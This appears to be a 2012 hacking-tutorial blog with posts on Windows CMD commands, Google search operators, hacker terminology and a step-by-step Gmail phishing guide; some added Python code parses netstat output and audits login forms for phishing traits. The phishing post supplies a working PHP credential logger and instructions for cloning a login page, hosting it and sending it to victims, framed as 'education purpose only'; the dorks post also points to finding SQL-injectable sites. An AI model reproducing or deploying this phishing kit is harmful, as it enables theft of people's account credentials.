Saturday 8 September 2012

Command Prompt Tips

We all use command prompt for many tasks.

So what is CMD?
Command Prompt (executable name cmd.exe) is the Microsoft-supplied command-line interpreter on OS/2, Windows CE and on Windows NT-based operating systems.

Professional hackers extensively use CMD to hack and gain access to Windows, so one must have a good knowledge of CMD in order to become a pro-hacker.

Here is a list of some CMD commands:

1. ipconfig
This is the top command for seeing the IP address, subnet mask and default gateway. It can also display and flush the DNS cache and re-register the system name in DNS. It is the most useful tool for viewing and troubleshooting TCP/IP problems.

2. systeminfo
Have a need to display operating system configuration information for a local or remote machine, including service pack levels? Then systeminfo is the tool to use. This command gives all the info including: host name, OS type, version, product ID, install date, boot time and hardware info (processor and memory).

5. netstat
Then netstat is the tool you want to run. The output provides valuable information on all connections and listening ports, including the executable used in the connections. In addition to the above info, you can view Ethernet statistics and resolve connecting host IP addresses to a fully qualified domain name.

6. nslookup
nslookup can be a valuable tool for testing and troubleshooting DNS servers.
For example, [nslookup google.com] displays the addresses and other info.

8. ping
These tools can be helpful with connectivity to other systems. Ping will test whether a particular host is reachable across an IP network.

For example, [ping google.com] displays the IP address of google.com.

9. eventvwr.msc
This will open up the Event Viewer, which can be used to view the activity done on the computer.
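As an added example (not part of the original post), here is one way to triage the netstat output described in item 5. It assumes the text comes from `netstat -ano` (numeric addresses plus owning PID); the sample output, addresses and PIDs are constructed.

```python
def parse_netstat(text):
    """Parse `netstat -ano` text into dicts; headers and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        f = line.split()
        if not f or f[0] not in ("TCP", "UDP"):
            continue
        if f[0] == "TCP" and len(f) == 5:
            proto, local, foreign, state, pid = f
        elif f[0] == "UDP" and len(f) == 4:
            # UDP rows have no State column: Proto, Local, Foreign, PID
            proto, local, foreign, pid = f
            state = ""
        else:
            continue  # unexpected layout, skip rather than guess
        host, _, port = local.rpartition(":")  # also works for "[::]:135"
        rows.append({"proto": proto, "host": host, "port": int(port),
                     "foreign": foreign, "state": state, "pid": int(pid)})
    return rows


WILDCARD = {"0.0.0.0", "[::]"}  # bound to every interface, not just loopback


def wildcard_listeners(rows):
    """(proto, port, pid) for sockets accepting traffic on all interfaces."""
    return sorted({(r["proto"], r["port"], r["pid"]) for r in rows
                   if r["host"] in WILDCARD
                   and (r["state"] == "LISTENING" or r["proto"] == "UDP")})


def remote_peers_by_pid(rows):
    """Map each PID to the remote endpoints it has ESTABLISHED connections to."""
    peers = {}
    for r in rows:
        if r["state"] == "ESTABLISHED":
            peers.setdefault(r["pid"], []).append(r["foreign"])
    return peers


# Constructed sample of `netstat -ano` output.
SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       888
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1204
  TCP    127.0.0.1:5354         0.0.0.0:0              LISTENING       2044
  TCP    192.168.1.20:49712     203.0.113.10:443       ESTABLISHED     4312
  TCP    [::]:135               [::]:0                 LISTENING       888
  UDP    0.0.0.0:5353           *:*                                    1620
"""
```

The PIDs returned can then be matched against `tasklist` output to see which program owns each listener or outbound connection.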



Thursday 6 September 2012

Google Dorks


Google!!!
One of the most used search engines of all time. Our solution to every problem is to "Google up everything", or what is now popularly called "Googling". We use Google for almost everything; it has now become an integral part of our life.
But do you know how to use it efficiently? Sometimes you want to search for something and end up clicking on every link that appears in the search results. And even after searching for hours you don't get a satisfactory result.
That was what you used to do before; from now on you will probably be using Google dorks for fast and efficient search.
For example, let's suppose that you want to search for ebooks on the topic 'networking'. Our obvious search queries would be like "Networking ebooks", "free ebooks for networking" etc. We keep going into the websites, clicking on link after link, and only then get proper download links. Now let's do the same search in a different way: type "ext:pdf networking" (without quotes) on Google. So how about that, impressed yet!!

If you are new to hacking, maybe this will be a new term for you, but it is very famous in the hacker world nowadays. Actually, they are all Google search operators, meaning hackers are taking advantage of Google search techniques.

Some of basic operators:
     1. site: It returns the web pages of the specified domain.
         For example, [site:Google.com] will return the links of web pages of the domain google.com.

     2. info: It will present information that Google has about that web page.
         For example, [info:www.google.com] will show information about the Google homepage.

     3. inurl: It restricts the results to sites whose URLs contain the specified phrase.
         For example, [inurl:coe-roorkee.com: contact us] gives you the contact details of the website.

     4. cache: It returns the cached web page retained by Google.
         For example, [cache:facebook.com] will display a cached page of Facebook.

     5. ext: It specifies the extension of the file type.
         For example, [ext:pdf] will display all PDF files related to hacking and ext:ppt will give PPTs for hacking.

     6. related: It returns the websites similar to the specified website.
         For example, [related:google.com] will list all the search engines in the search result.

     7. define: It will provide a definition of the words you enter after it, gathered from various online sources.
         For example, [define:Hacking] will define the meaning of hacking.

     8. link: It will list web pages that have links to the specified web page.
         For example, [link:www.google.com] will list web pages that have links pointing to the Google homepage.


Google dorks can be used to find vulnerabilities in sites. Hackers use Google dorks to find SQL vulnerabilities in sites.
I'll discuss how to use Google dorks for SQL injection in later posts.

Monday 3 September 2012

How To Hack using Phishing Method



What is Phishing?


Phishing is the process of stealing sensitive information, such as usernames, passwords, and bank information, by pretending to be someone you’re not. An example of this would be if you receive an e-mail from a hacker pretending to be your bank. In this e-mail, it might tell you that you need to update your account before it expires, and then the hacker provides a link. Once you click on the link, you arrive at a website that looks exactly like your actual bank page. In reality it’s just a perfect replica, and when you input your login details, it sends them to the hacker's email or stores them on his web server. Hackers that create the best, most deceiving phishing web pages are knowledgeable in the area of HTML and PHP programming. Below I will show a simple example of some of the steps a hacker might take to create a phishing website. Seeing the steps a hacker would take will help you defend against such an attack.

Note: This is for education purpose only.

Follow the following steps:

1. First the hacker chooses a target. The most popular targets for phishing attacks are e-mail services such as Hotmail, facebook and Gmail because they are the most common and once a hacker gets access to your e-mail, he also gets access to a load of other user information for all the other websites you use. In this example we will pretend the hacker chose Gmail as his target.

2. After choosing his target, the hacker will go to the website and save the whole main page. I use Mozilla Firefox (highly recommend using this browser for its security and customization). So I would go to www.gmail.com and click File -> Save page as… , or simply hit <CTRL> + S which does this automatically. Choose where you would like to save the web page and hit Save.



3. Next the hacker would create a PHP script to do his dirty deed of stealing your information. Below is a simple PHP script that logs and stores your login details when you click “Sign in”. To see how it works, copy and paste the following code into notepad. Next save it into the same directory as you saved the Gmail page, and name it phish.php. It should make a PHP file in the folder. If you don't find any PHP file then save the file with quotations like "phish.php"; it should make a PHP file.
 In addition to the phish.php page, create a new empty text file and name it list.txt.

CODE:
------------------------------------------------------------------------------------------------------------
<?php
header("Location: http://www.gmail.com.com");
$handle = fopen("list.txt", "a");
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
------------------------------------------------------------------------------------------------------------

So far you should see the following in your folder:

4. Now the hacker would have to edit the main Gmail page to include his PHP script. To see what the hacker would do, open up the main Gmail page named ServiceLogin.htm with notepad.

5. Hit <CTRL> + F , or go to Edit -> Find , type in action and hit “Find Next”.

6. This will highlight the first occurrence of the word “action” in the script and you should see the following:
There are two “action” occurrences in the script so make sure you have the right one by looking at the “form id” name above. Change the link between action = “ “ to phish.php . This will make the form submit to your PHP phish script instead of to Google. After the link you will see the code:

Change the word “POST” to “GET” so that it looks like method=”GET”. What the GET method does is submit the information you type in through the URL so that the PHP script can log it.

7. Save the file and rename ServiceLogin.htm to index.htm. The reason you want to name it “index” is so when you upload it to a web host and someone goes to your link, the index page is the first page that shows up.

8. Now you'll need a free web hosting service that supports PHP.
Go to http://www.google.com and search for free web hosting websites.
Choose any one of the websites. I'll recommend choosing either 00webhost.com or 5gbfree.com (I used this one).

9. Sign up for a free account. After signing up, go to the website and then log in with your account.
It will take you to the C-panel X. There, go to the file manager and choose webroot as the directory.

 A new tab will open up. There, upload all the files: index.html, list.txt and the PHP file.
When uploading, change the permission of list.txt to 777 by ticking all the boxes.


Now your website is ready for phishing.
Now send your website's domain name to the slave. You can find the domain name of your website in the C-panel.
Whenever someone logs in with your fake page, their user name and password will be saved in list.txt; you can go to the file manager and view it from there.

If any problem persists let me know in the comments.
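From the defender's side, the cloned page described above leaves recognisable marks: a password form that submits by GET and posts to a host that is not the brand's own. The following is an added example (not code from the original post) that audits a page's HTML for those marks; the host names, URLs and sample forms are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormCollector(HTMLParser):
    """Collect every <form> with its action, method and input types."""

    def __init__(self):
        super().__init__()
        self.forms, self._open = [], None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            method = a.get("method", "").strip().lower() or "get"  # HTML default
            self._open = {"action": a.get("action", ""), "method": method, "types": []}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            self._open["types"].append(a.get("type", "text").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None


def audit_login_forms(html, page_url, brand_hosts):
    """Return [(resolved_action_url, [reasons])] for suspicious password forms."""
    collector = FormCollector()
    collector.feed(html)
    findings = []
    for form in collector.forms:
        if "password" not in form["types"]:
            continue  # only credential forms matter here
        target = urljoin(page_url, form["action"])  # resolve relative actions
        parts = urlsplit(target)
        host = parts.hostname or ""
        reasons = []
        if form["method"] == "get":
            reasons.append("password sent via GET, so it lands in URLs and logs")
        if host not in brand_hosts:
            reasons.append("form submits to non-brand host " + host)
        if parts.scheme != "https":
            reasons.append("submission is not over HTTPS")
        if reasons:
            findings.append((target, reasons))
    return findings


# Constructed samples: a cloned page as described above, and a genuine form.
CLONE = ('<form id="login" action="phish.php" method="GET">'
         '<input type="text" name="Email"><input type="password" name="Passwd"></form>')
GENUINE = ('<form id="login" action="https://accounts.example.com/login" method="post">'
           '<input type="email" name="Email"><input type="password" name="Passwd"></form>')
```

The same three checks apply to proxy or web-server logs: a query string carrying a password parameter to an unfamiliar host is the trace this kind of page leaves behind.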

Terms One should know


Some Common Must-Know Terms

What is a Hacker:

A hacker is someone who likes to tinker with electronics or computer systems. Hackers like to explore and learn how computer systems work, finding ways to make them do what they do better, or do things they weren’t intended to do.

There are two types of hackers:

White Hat – These are considered the good guys. White hat hackers don’t use their skills for illegal purposes. They usually become Computer Security experts and help protect people from the Black Hats.

Black Hat – These are considered the bad guys. Black hat hackers usually use their skills maliciously for personal gain. They are the people that hack banks, steal credit cards, and deface websites.
These two terms came from the old western movies where the good guys wore white hats and the bad guys wore black hats.

Now if you’re thinking, “Oh boy! Being a black hat sounds awesome!”, Then I have a question for you. Does it sound cool to live in a cell the size of your bathroom and be someone’s butt buddy for many years? That’s what I thought.

Hacker Hierarchy

Script kiddies – These are the wannabe hackers. They are looked down upon in the hacker community because they are the people that make hackers look bad. Script kiddies usually have no hacking skills and use the tools developed by other hackers without any knowledge of what’s happening behind the scenes.

Intermediate hackers – These people usually know about computers and networks, and have enough programming knowledge to understand relatively what a script might do, but like the script kiddies they use pre-developed, well-known exploits (an exploit is a piece of code that takes advantage of a bug or vulnerability in a piece of software and allows you to take control of a computer system) to carry out attacks.

Elite Hackers – These are the skilled hackers. They are the ones that write the many hacker tools and exploits out there. They can break into systems and hide their tracks or make it look like someone else did it. You should strive to eventually reach this level.


IP Addresses:

 An Internet Protocol address (IP address) is a numerical label assigned to each device (e.g., computer, printer). Every computer connected to the Internet has a unique number which is its identity over the Internet. An IP address serves two principal functions: host or network interface identification and location addressing. We communicate on the Internet by IP addresses.
A typical IP address looks like the following: 121.14.11.12.
You can find your computer's IP address by clicking here.


Domain Name System (DNS) Lookup:

The process of converting a domain name into its respective IP address. Whenever you type a web address, the browser automatically performs a DNS lookup for that website.



DNS Server:

A DNS server is a server which handles the DNS lookup query made by the browser. A DNS server can be locally installed in any specific organisation.



Port:

In computer hardware, a port serves as an interface between the computer and other computers or peripheral devices. It is usually used for exchanging data. Ports can be external (hardware), e.g. a USB port, or virtual.

Virtual ports are usually used by web applications to communicate with the servers.



HTTP:

Hyper Text Transfer Protocol is the protocol used by browsers to communicate with web servers.

HTTPS is the secure form of HTTP usually used for establishing a secure connection when highly sensitive data communication occurs.



Proxy Servers:

A proxy server is a server that acts as an intermediary for requests from clients seeking resources from other servers. Whenever a client sends a request for any website, it is forwarded to the proxy server, and then the proxy server forwards this request to the server.

A proxy server has a variety of potential purposes, including:

  • To keep machines behind it anonymous, mainly for security.
  • To speed up access to resources (using caching). Web proxies are commonly used to cache web pages from a web server.
  • To prevent downloading the same content multiple times (and save bandwidth).
  • To log / audit usage, e.g. to provide company employee Internet usage reporting.
  • To scan transmitted content for malware before delivery.
  • To scan outbound content, e.g., for data loss prevention.
  • Access enhancement/restriction
  • To apply access policy to network services or content, e.g. to block undesired sites.
  • To access sites prohibited or filtered by your ISP or institution.
  • To bypass security / parental controls.
  • To circumvent Internet filtering to access content otherwise blocked by governments.


At last the most important one...

What does it take to become a hacker?

Becoming a great hacker isn’t easy and it doesn’t happen quickly. Being creative helps a lot. There is more than one way a problem can be solved, and as a hacker you encounter many problems. The more creative you are the bigger chance you have of hacking a system without being detected. Another huge quality you must have is the will to learn because without it, you will get nowhere. Remember, Knowledge is power. Patience is also a must because many topics can be difficult to grasp and only over time will you master them.